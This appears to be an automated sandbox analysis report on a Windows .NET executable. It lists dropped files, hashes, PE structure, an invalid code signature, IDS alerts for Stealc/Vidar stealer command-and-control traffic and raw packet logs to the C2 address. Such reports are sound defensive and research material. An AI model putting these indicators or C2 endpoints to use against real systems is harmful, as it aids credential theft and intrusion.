                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1048575
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1f/:F
                                                                                                                                                                  MD5:52EEA21AFDC1FA07894225ED9536D245
                                                                                                                                                                  SHA1:9F0EDB171DBF05A67ADEDA2C3FF1768D5066F9BE
                                                                                                                                                                  SHA-256:3A36D5B3161D3A27AE6D1390D5D959786DADF6860882022745B1F73190D04E9C
                                                                                                                                                                  SHA-512:EC45901B1BCB35F2B166C519EE6F7C072D46C13D94327415AC316E16DDB552C1CBCA807827132F0167D121ED762CB6364AC19BCCC2699A6D033A3B57929E7A69
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

                                                                                                                                                                  C:\Users\user\AppData\Roaming\msvcp110.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):594944
                                                                                                                                                                  Entropy (8bit):6.950278574609064
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:/JnGC1gieh7IGqNOIf/eDWeYUZ2q/MtTTwBfJA/gMdOPapZ5n1kM9KwdTVORr:2ieVqotaCsq/0TTMGHdKM9KwdTV4r
                                                                                                                                                                  MD5:D135B1643ABA57454EF94C7F29C3B178
                                                                                                                                                                  SHA1:3157D4150C3562E95D93A61C9CCE0F1DCEB7DEBC
                                                                                                                                                                  SHA-256:8BE5CF1CFED0A9F6EAF4C978511461AD39ED8A53DC1D8BE5C97990418B84B906
                                                                                                                                                                  SHA-512:45177DAA16018D6C2989963A6CDEB59B4CF037674B2F8BFAA85CB332A9A6AF291581E04880D2156C65D14760C5A3ED02BAF3DE340C31441F668DB028BBAA07C3
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........PE..L......f...........!...&.....................................................@............@.............................x.......<............................ ..H...P...................................@...............P............................text...C~.......................... ..`.rdata...k.......l..................@..@.data...............................@....reloc..H.... ......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                  Entropy (8bit):4.465913296824278
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:azZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:8ZHtBZWOKnMM6bFpZj4
                                                                                                                                                                  MD5:42BB7FF98BBC2C64A335A176D4A9F29E
                                                                                                                                                                  SHA1:823280E15AC96A74D8C00F4EDD4DD5810C55E142
                                                                                                                                                                  SHA-256:77F0CC2EC51F713BA2B5509823E3D60002AE85394D786B3F021FD5D07840DBA7
                                                                                                                                                                  SHA-512:B024AE441BEA17F4927169EEC1356EE52E7AACC8189B2FC99D2BCB7E6058CA50051D7C53A9CAE8CD661B92D6FBC654953BDDF4EA3A115CA5046FA66E5F3614AE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*.i.4.................................................................................................................................................................................................................................................................................................................................................~.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Entropy (8bit):7.891145170897587
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                  File name:file.exe
                                                                                                                                                                  File size:418'480 bytes
                                                                                                                                                                  MD5:37ec6ac7a655216941a30dc46fe1b189
                                                                                                                                                                  SHA1:cf6637aabee2fd26a76e30db0a289201305372fb
                                                                                                                                                                  SHA256:677862ec62130345467fc6472bfbeff124fd2716897db3f8549c29f016ef13cd
                                                                                                                                                                  SHA512:ec33b2631e538d29bf35612e247ec61baf56c5202df6728b4e10b03ae6c9438ceafc698474b289b102ff3a6607d6399af24ed7daee4debd38062d48c22ac4edc
                                                                                                                                                                  SSDEEP:12288:nLYJvfeQmGFFxAKKWKuQLTRURHjZl3EBoYruJ3StafO:L5I5KW5pPW/n
                                                                                                                                                                  TLSH:6B94CE9D725036DFC813D8729EE81DA8FA6034BB931B4113A02355ADEE4DA97CF940F6
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................X............... ....@.. ....................................@................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x46800a
                                                                                                                                                                  Entrypoint Section:
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x66FDF27F [Thu Oct 3 01:25:19 2024 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:4
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                  • 22/03/2021 01:00:00 22/03/2024 00:59:59
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:394B591BC2CE78B7CF207BF4082E62F4
                                                                                                                                                                  Thumbprint SHA-1:ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
                                                                                                                                                                  Thumbprint SHA-256:AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
                                                                                                                                                                  Serial:00F6AD45188E5566AA317BE23B4B8B2C2F

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp dword ptr [00468000h]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x587c00x4b.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x728.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x606000x5cb0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x680000x8
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x580000x48.text
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                  Sections

                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  n@G>6P0x20000x54df00x54e00bdf10184a4717097861fbd83ec9e12a6False1.00033367083947data7.9994507847955285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .text0x580000xa7e80xa800d71122b7a8a9143aeb9b1eaacfe94a8dFalse0.39074125744047616data4.738468827255519IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .rsrc0x640000x7280x8007265a8a1bb76b05d0539b6aa89c4c7ebFalse0.39404296875data3.85271303443794IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                  .reloc0x660000xc0x200354e5ffc7f8a670c981da5a85608e4ceFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                  0x680000x100x200530a5ee2413e60387bc5b0572eacef22False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                                  Resources

                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_VERSION0x640a00x49cdata0.42542372881355933
                                                                                                                                                                  RT_MANIFEST0x6453c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                  Imports

                                                                                                                                                                  DLLImport
                                                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2024-10-03T03:35:53.721399+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972249.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:54.941629+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972349.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:56.366413+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972449.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:57.730654+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972549.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:58.429123+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.64972549.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:58.429229+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.649725TCP
                                                                                                                                                                  2024-10-03T03:35:59.102733+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972649.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:35:59.801644+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.649726TCP
                                                                                                                                                                  2024-10-03T03:36:00.559955+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972749.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:01.905602+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972849.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:04.977333+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972949.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:06.117394+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973049.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:07.390575+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973149.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:08.845534+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973249.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:10.824936+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973349.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:12.845715+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973549.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:14.763414+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973649.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:16.183576+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973749.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:17.668662+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973849.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:20.838688+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973949.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:22.146206+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974049.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:23.489607+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974149.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:25.031403+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974349.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:27.088335+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974449.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:28.988557+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974549.12.197.9443TCP
                                                                                                                                                                  2024-10-03T03:36:30.410110+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649746147.45.44.10480TCP

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Oct 3, 2024 03:35:51.444037914 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:51.444076061 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:51.444180965 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:51.463304996 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:51.463324070 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.105868101 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.105952978 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.159409046 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.159449100 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.159847975 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.160891056 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.165117979 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.211397886 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.578246117 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.578269958 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.578284979 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.578342915 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.578355074 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.578497887 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.578497887 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.685750961 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.685830116 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.685915947 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.685933113 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.685956001 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.686342955 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.694257975 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.694380999 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.694399118 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.694479942 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.694519997 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.694653034 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.694876909 CEST49721443192.168.2.6104.102.49.254
                                                                                                                                                                  Oct 3, 2024 03:35:52.694905996 CEST44349721104.102.49.254192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.750772953 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:52.750821114 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:52.751035929 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:52.751328945 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:52.751344919 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:53.721319914 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:53.721399069 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:53.726183891 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:53.726203918 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:53.735991955 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:53.736062050 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:53.741624117 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:53.783406973 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.230211020 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.230300903 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.230319023 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.230396986 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.230406046 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.230454922 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.244371891 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.244417906 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.246721029 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.246771097 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.246848106 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.247180939 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.247194052 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.940577030 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.941628933 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.945730925 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.945753098 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:54.947395086 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:54.947412968 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.644252062 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.644371033 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.644402981 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.644431114 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.644449949 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.644469023 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.644810915 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.644825935 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.653182030 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.653229952 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:55.653294086 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.653539896 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:55.653549910 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:56.366292000 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:56.366413116 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:56.367160082 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:56.367171049 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:35:56.368835926 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:35:56.368844032 CEST4434972449.12.197.9192.168.2.6
